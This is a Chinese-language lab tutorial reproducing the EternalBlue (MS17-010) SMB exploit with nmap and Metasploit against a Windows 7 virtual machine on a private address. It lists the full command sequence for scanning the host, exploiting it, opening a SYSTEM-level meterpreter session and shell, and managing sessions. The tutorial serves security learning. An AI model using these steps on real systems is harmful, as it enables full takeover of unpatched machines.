永恒之蓝漏洞复现
漏洞背景:
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
存在漏洞的主机只需要开放445端口即可被攻击,获取系统最高权限。
环境准备:
- 攻击端 Linux kali:192.168.214.128
- 被攻击端 win 7 x64:192.168.214.129(关闭防火墙)
一、扫描端口
使用 nmap 扫描目标端口;
nmap 192.168.214.129
查看结果:445端口为开放状态,操作系统为 win 7;
二、扫描漏洞
调用 msf 工具选择永恒之蓝扫描模块,进行漏洞扫描
- 调用 msf 工具;
msfconsole
- 选择漏洞扫描模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择扫描模块
use 3
- 查看运行永恒之蓝攻击的必需参数;
show options
- RHOSTS为目标主机,必需项;
set rhosts 192.168.214.129
- 运行扫描
run
显示目标主机很可能会受到永恒之蓝漏洞的攻击。
三、漏洞攻击
- 选择漏洞攻击模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择攻击模块
use 0
- 查看参数;
show options
- 设置RHOSTS;
set rhosts 192.168.214.129
- 运行攻击;
run
攻击成功后返回一个 meterpreter 会话,通过该会话可以控制目标主机system权限。
- 输入 shell 即可进入win7的cmd;
# 进入命令行
shell
# 切换字符集编码,解决乱码问题
chcp 65001
- 查看主机信息;
四、放入后台
- 将会话放入后台,方便后续调用;
# 退出cmd
exit
# 将当前会话放入 msf 后台
background
- 查看会话并调用
# 查看所有已连接的会话
sessions
# 调用指定会话
sessions -i 1
